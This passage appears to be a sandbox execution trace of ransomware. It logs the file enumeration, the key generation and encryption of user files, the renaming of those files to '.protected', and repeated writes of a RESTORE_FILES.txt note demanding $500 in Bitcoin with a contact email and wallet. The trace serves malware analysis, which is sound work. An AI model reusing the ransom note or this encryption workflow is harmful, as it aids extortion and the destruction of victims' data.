HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.355] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.355] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.356] lstrlenA (lpString="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") returned 684 [0089.356] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.356] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.356] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.356] CloseHandle (hObject=0x150) returned 1 [0089.356] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.356] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.356] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\RESTORE_FILES.txt") returned 88 [0089.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.363] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.363] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.363] lstrlenA (lpString="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") returned 684 [0089.363] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.363] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.363] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.363] CloseHandle (hObject=0x14c) returned 1 [0089.364] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="Windows") returned -1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="Program Files") returned -1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="Program Files (x86)") returned -1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="$Recycle.bin") returned 1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="System Volume Information") returned -1 [0089.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45") returned 71 [0089.364] lstrcmpW (lpString1="jre1.7.0_45", lpString2=".") returned 1 [0089.364] lstrcmpW (lpString1="jre1.7.0_45", lpString2="..") returned 1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*") returned 73 [0089.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.365] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.365] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.365] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.365] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.365] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\.") returned 73 [0089.365] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0089.365] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.365] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.365] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.365] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.365] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.365] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\..") returned 74 [0089.365] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.365] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.365] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="Windows") returned -1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="Program Files") returned -1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="Program Files (x86)") returned -1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="$Recycle.bin") returned 1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="System Volume Information") returned -1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.366] StrStrIW (lpFirst="Data1.cab", lpSrch=".protected") returned 0x0 [0089.366] lstrcmpW (lpString1="Data1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0089.366] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.366] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.367] StrStrW (lpFirst="Data1.cab", lpSrch=".txt") returned 0x0 [0089.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.367] StrStrW (lpFirst="Data1.cab", lpSrch=".rar") returned 0x0 [0089.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.367] StrStrW (lpFirst="Data1.cab", lpSrch=".zip") returned 0x0 [0089.368] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.369] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.369] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.369] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.369] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.379] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.379] CloseHandle (hObject=0x150) returned 1 [0089.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.protected") returned 91 [0089.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.protected")) returned 1 [0089.380] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="Windows") returned -1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="Program Files") returned -1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="Program Files (x86)") returned -1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="$Recycle.bin") returned 1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="System Volume Information") returned -1 [0089.380] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.380] StrStrIW (lpFirst="jre1.7.0_45.msi", lpSrch=".protected") returned 0x0 [0089.380] lstrcmpW 
(lpString1="jre1.7.0_45.msi", lpString2="RESTORE_FILES.txt") returned -1 [0089.380] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.380] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.381] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.381] StrStrW (lpFirst="jre1.7.0_45.msi", lpSrch=".txt") returned 0x0 [0089.381] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.382] StrStrW (lpFirst="jre1.7.0_45.msi", lpSrch=".rar") returned 0x0 [0089.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.382] StrStrW (lpFirst="jre1.7.0_45.msi", lpSrch=".zip") returned 0x0 [0089.382] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.395] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.395] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.396] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.396] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.403] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.403] CloseHandle (hObject=0x150) returned 1 [0089.403] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.protected") returned 97 [0089.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.protected")) returned 1 [0089.404] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.404] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.404] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\RESTORE_FILES.txt") returned 89 [0089.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.422] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.422] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, 
lpOverlapped=0x0) returned 1 [0089.423] lstrlenA (lpString="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") returned 684 [0089.423] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.423] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.423] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.423] CloseHandle (hObject=0x14c) returned 1 [0089.423] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.424] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.424] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RESTORE_FILES.txt") returned 77 [0089.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.425] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.425] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.426] lstrlenA (lpString="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") returned 684 [0089.426] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.426] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.426] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.426] CloseHandle (hObject=0xd8) returned 1 [0089.426] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.426] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\RESTORE_FILES.txt") returned 72 [0089.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.427] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.427] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, 